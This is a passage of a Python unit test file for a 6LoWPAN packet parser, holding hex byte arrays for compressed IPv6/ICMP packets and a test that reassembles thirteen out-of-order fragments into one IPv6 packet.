0x7a, 0xf0, 0xd0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x11,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_9(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xd0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x11,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_defragment_big_IPv6_packet_when_parse_method_called_with_fragments_in_random_order(
self):
# GIVEN
fragment_1 = bytearray([
0xC5, 0x00, 0x31, 0x9F, 0x7A, 0x33, 0x3A, 0x80, 0x00, 0xFA, 0xA5,
0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x43, 0x53,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53,
0x11, 0x4C, 0x66, 0x4E
])
fragment_2 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x11, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0xa3, 0x53, 0x11, 0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04,
0x4E, 0x92, 0x1B, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x22, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA
])
fragment_3 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x1D, 0x44, 0x54, 0x12, 0xD3, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01,
0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0xC0, 0x00,
0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11,
0x44, 0xCC, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44,
0x66, 0x77
])
fragment_4 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x29, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15,
0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E,
0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00,
0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC,
0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66,
0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92,
0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99
])
fragment_5 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x35, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53,
0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54,
0x12, 0xa3, 0x53, 0x11, 0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00,
0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A
])
fragment_6 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x41, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0,
0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x22,
0xBB, 0x53, 0x1A, 0x44, 0x67, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54,
0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0xD3, 0x53, 0x11, 0x44,
0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A,
0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44,
0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0xC0, 0x00, 0xFA,
0x15, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44,
0xCC, 0x4E
])
fragment_7 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x4D, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBA, 0x53, 0x1A, 0x60, 0x00, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x64,
0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x11, 0x12, 0x13, 0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
])
fragment_8 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x59, 0x02, 0x00, 0x1A, 0x2A, 0x3F, 0x09,
0xAB, 0x43, 0x60, 0x00, 0xF0, 0x00, 0x00, 0x10, 0x3A, 0x64, 0xfe,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x11,
0x12, 0x13, 0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43, 0x80, 0x00,
0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44,
0x66, 0x77
])
fragment_9 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x65, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11,
0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15,
0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E,
0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00,
0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC,
0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0xa3, 0x53, 0x11, 0x44, 0x66,
0xFE, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92,
0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x4D, 0x66,
0x77, 0x99
])
fragment_10 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x71, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80,
0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53,
0x11, 0x44, 0x66, 0x4E, 0x22, 0xBB, 0x51, 0x1A, 0x44, 0x66, 0x77,
0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54,
0x12, 0xD3, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66,
0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00,
0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB,
0x53, 0x1A
])
fragment_11 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x7D, 0xC0, 0x00, 0xFA, 0xA5, 0x0B, 0xC0,
0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44, 0xCC, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54,
0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12, 0x4A, 0x53, 0x11, 0x44,
0x66, 0x4E, 0x92, 0xBC, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x1A,
0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44,
0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA,
0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA,
0xA5, 0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x4E
])
fragment_12 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x89, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66,
0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44,
0x54, 0x12, 0x43, 0x53, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53,
0x3A, 0x44, 0x66, 0x77, 0x99, 0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44,
0x66, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3,
0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92,
0xBB, 0x53, 0x1A, 0x80, 0x00, 0xFA, 0xA5, 0x0B, 0xC0, 0x00, 0x04,
0x4E, 0x92, 0xBB, 0x53, 0x11, 0x4C, 0x66, 0x4E, 0x92, 0xBB, 0x53,
0x1A, 0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54,
0x01, 0xAA
])
fragment_13 = bytearray([
0xE5, 0x00, 0x31, 0x9F, 0x95, 0x44, 0x54, 0x12, 0xa3, 0x53, 0x11,
0x44, 0x66, 0xFE, 0x92, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x1A, 0x92, 0xBB, 0x53, 0x11, 0x44, 0x66, 0x92, 0xBB, 0x53, 0x1A,
0x44, 0x66, 0x77, 0x99, 0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01,
0xAA, 0x11, 0x44, 0x66, 0x4E, 0x92, 0xBB, 0x53, 0x1A, 0x80, 0x00,
0xFA, 0xA5, 0x1B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0x1B, 0x53, 0x11,
0x44, 0x66, 0x4E, 0x22, 0xBB, 0x53, 0x1A, 0x44, 0x66, 0x77, 0x99,
0x15, 0xB3, 0x00, 0x54, 0xCC, 0x54, 0x01, 0xAA, 0x44, 0x54, 0x12,
0xD3, 0x53, 0x11, 0x44, 0x66
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x00, 0x11, 0x12, 0x13, 0x14, 0x15]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
self.assertIsNone(parser.parse(io.BytesIO(fragment_4), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_2), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_3), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_13), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_5), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_6), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_7), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_8), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_9), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_10), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_11), message_info))
self.assertIsNone(parser.parse(io.BytesIO(fragment_12), message_info))
actual_ipv6_packet = parser.parse(io.BytesIO(fragment_1), message_info)
# THEN
ipv6_packet = bytearray([
0x60,
0x00,
0x00,
0x00,
0x04,
0xD8,
0x3A,
0x40,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
0x43, # / * 40 * /
0x80,
0x00,
0xAB,
0x64,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A, # / * 120 * /
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A, # / * 200 * /
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A, # / * 280 * /
0xC0,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A, # / * 360 * /
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x67,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0xC0,
0x00,
0xFA,
0x15,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBA,
0x53,
0x1A,
0x60,
0x00,
0x00,
0x00,
0x00,
0x10,
0x3A,
0x64,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
0x43, # / * 720 * /
0x60,
0x00,
0xF0,
0x00,
0x00,
0x10,
0x3A,
0x64,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x00,
0x11,
0x12,
0x13,
0x14,
0x15,
0xfe,
0x80,
0x00,
0x00,
0x00,
0x00,
0x00,
0x00,
0x02,
0x00,
0x1A,
0x2A,
0x3F,
0x09,
0xAB,
0x43,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x4D,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x51,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0xC0,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0xCC,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
